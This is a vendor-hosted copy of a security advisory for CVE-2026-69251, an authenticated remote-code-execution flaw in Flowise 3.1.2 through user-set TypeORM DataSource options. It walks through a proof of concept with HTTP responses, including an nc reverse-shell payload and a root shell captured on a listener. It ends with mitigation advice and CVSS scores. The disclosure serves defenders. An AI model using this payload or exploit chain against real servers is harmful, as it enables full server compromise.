Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

CVE-2026-69251

Flowise RCE via TypeORM DataSource
Back to all
CVE

CVE-2026-69251

Flowise RCE via TypeORM DataSource

=============================================================================

                                                            Security Advisory

                                                                       elttam

Topic:          Flowise RCE via TypeORM DataSource

Module:         FlowiseAI/Flowise

Disclosed:      15-Apr-2026

Credits:        Alex Brown

Affects:        FlowiseAI/Flowise 3.1.2

I.   Background

Flowise AI is an open-source, low-code platform for building AI applications—such as chatbots, workflows, and autonomous agents—through an intuitive drag-and-drop interface, minimising the need for extensive coding.

Flowise allows users to connect to remote databases within a flow, which is performed using the TypeORM DataSource.

II.  Problem Description

The following nodes allowed users to set arbitrary options for the TypeORM DataSource class using the additionalConfig node input:

This is considered a dangerous coding practice, because the options for the TypeORM DataSource class support loading local files as JavaScript code.

The following documents the steps to reproduce this RCE vulnerability by abusing the additionalConfig input on a MySQL Record Manager (packages/components/nodes/recordmanager/MySQLRecordManager/MySQLrecordManager.ts) node:

  1. Log into a Flowise instance and note the organisation ID in the response from POST /api/v1/auth/login, as shown below.
HTTP/1.1 200 OK
Set-Cookie: token=<REDACTED>; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: refreshToken=<REDACTED>; Path=/; HttpOnly; SameSite=Lax
Set-Cookie: connect.sid=<REDACTED>; Path=/; HttpOnly; SameSite=Lax
Content-Type: application/json; charset=utf-8
Content-Length: 671
ETag: W/"29f-xnGhZVNYDhOOLUuVSPq0rZLC8mE"
Date: Wed, 15 Apr 2026 10:58:44 GMT
Connection: keep-alive
Keep-Alive: timeout=5
{
    "activeOrganizationCustomerId": null,
    "activeOrganizationId": "c060f6ef-047b-47b0-8f1a-15ffa11961cc", <1>
    "activeOrganizationProductId": "",
    "activeOrganizationSubscriptionId": null,
    "activeWorkspace": "Default Workspace",
    "activeWorkspaceId": "3206d8d3-944f-48c6-9332-11e2752b793e",
    "assignedWorkspaces": [
        {
            "id": "3206d8d3-944f-48c6-9332-11e2752b793e",
            "name": "Default Workspace",
            "organizationId": "c060f6ef-047b-47b0-8f1a-15ffa11961cc", <1>
            "role": "owner"
        }
    ],
    "email": "admin@flowise.local",
    "features": {},
    "id": "b60bc90f-c77d-41ba-bb7b-cbd7f9e6d4ab",
    "isOrganizationAdmin": true,
    "isSSO": false,
    "name": "Admin",
    "permissions": [
        "organization",
        "workspace"
    ],
    "roleId": "b1d1a990-b908-1f7f-889b-5603cb093ff1"
}

<1> The organisation ID that is required for a later step.

  1. Create a new document store and use the File Loader to upload a file containing JavaScript code that would be executed outside the vm2 sandbox. The following script is a reverse shell payload that connects to 172.17.0.1:1337 that had a filename of rce.js.
process.mainModule.require('child_process').execSync('/usr/bin/nc 172.17.0.1 1337 -e /bin/sh')
  1. Using a proxy tool such as Burp Suite or the browser's debug network tab, observe the response from the 

POST /api/v1/document-store/loader/process/{loader_id} endpoint and retrieve the storeId, as demonstrated in the response below.

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Content-Length: 1000
ETag: W/"3e8-7uqpJlOmso3F99EQLpeEzY2xh/o"
Date: Wed, 15 Apr 2026 10:59:34 GMT
Connection: keep-alive
Keep-Alive: timeout=5
{
    "characters": 94,
    "chunks": [
        {
            "chunkNo": 1,
            "docId": "544ff838-bc55-4b28-97a1-c7442710b014",
            "id": "7f5f4d41-f684-4b16-9b3c-c1623678e7a0",
            "metadata": "{\"source\":\"blob\",\"blobType\":\"\"}",
            "pageContent": "process.mainModule.require('child_process').execSync('/usr/bin/nc 172.17.0.1 1337 -e /bin/sh')",
            "storeId": "afb065cc-8b53-4ff3-82d3-a19e012a2ecb" <1>
        }
    ],
    "count": 1,
    "currentPage": 1,
    "description": "",
    "docId": "544ff838-bc55-4b28-97a1-c7442710b014",
    "file": {
        "files": [
            {
                "id": "5becc8f6-713b-4c6b-8ca8-3275791a730c",
                "mimePrefix": "application/x-javascript",
                "name": "rce.js",
                "size": 94,
                "status": "NEW",
                "uploaded": "2026-04-15T10:59:34.039Z"
            }
        ],
        "id": "544ff838-bc55-4b28-97a1-c7442710b014",
        "loaderConfig": {
            "file": "FILE-STORAGE::[\"rce.js\"]",
            "legacyBuild": "",
            "metadata": "",
            "omitMetadataKeys": "",
            "pointerName": "",
            "textSplitter": "",
            "usage": "perPage"
        },
        "loaderId": "fileLoader",
        "loaderName": "RCE File",
        "status": "SYNC",
        "totalChars": 94,
        "totalChunks": 1
    },
    "storeName": "RCE POC Store",
    "workspaceId": "3206d8d3-944f-48c6-9332-11e2752b793e"
}

<1> The store ID that is required for a later step.

  1. Import the following Chatflow and configure the "MySQL Record Manager", "OpenAI Embedding" and "Weaviate" nodes.

typeorm-datasource-rce.json

  1. Open the "Additional Parameters" window for the "MySQL Record Manager" node replace the placeholder values in the additionalConfig.entities setting. The ${HOME} is the home directory of the user running the Flowise server (e.g., /root on the published Docker image). The screenshot below shows an example path for the reverse shell payload that was uploaded in the previous steps.

<img width="2229" height="1148" alt="mysql-datasource-config" src="https://github.com/user-attachments/assets/f4351ee2-9761-458d-a2f8-cf21383394a2" />

  1. Start an Upsert operation and observe the reverse shell payload being executed, as demonstrated in the terminal output below.
$ nc -lnvp 1337
Listening on 0.0.0.0 1337
Connection received on 172.17.0.2 43421
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

III. Impact

This sandbox escape vulnerability allows an authenticated user to execute arbitrary code on a server running Flowise, resulting in full compromise of the application.

IV.  Solution

Do not allow users full control of the options for the TypeORM DataSource class. The following DataSource options are considered dangerous and should not be allowed:

  • extra: Could be abused to provide dangerous driver options.
  • entities: Could be abused to load arbitrary JavaScript files.
  • subscribers: Could be abused to load arbitrary JavaScript files.
  • migrations: Could be abused to load arbitrary JavaScript files.

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
9
-
4.0
CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
C
H
U
0
-
C
H
U
9.9
-
3.1
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Related Resources

No items found.

References

https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-g32j-mmxr-gfq5, https://github.com/FlowiseAI/Flowise

Severity

9.9

CVSS Score
0
10

Basic Information

Base CVSS
9.9
EPSS Probability
0.01058%
EPSS Percentile
0.62001%
Introduced Version
0,2.2.2,2.1.4,2.0.0,1.6.5
Fix Available
3.1.3

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading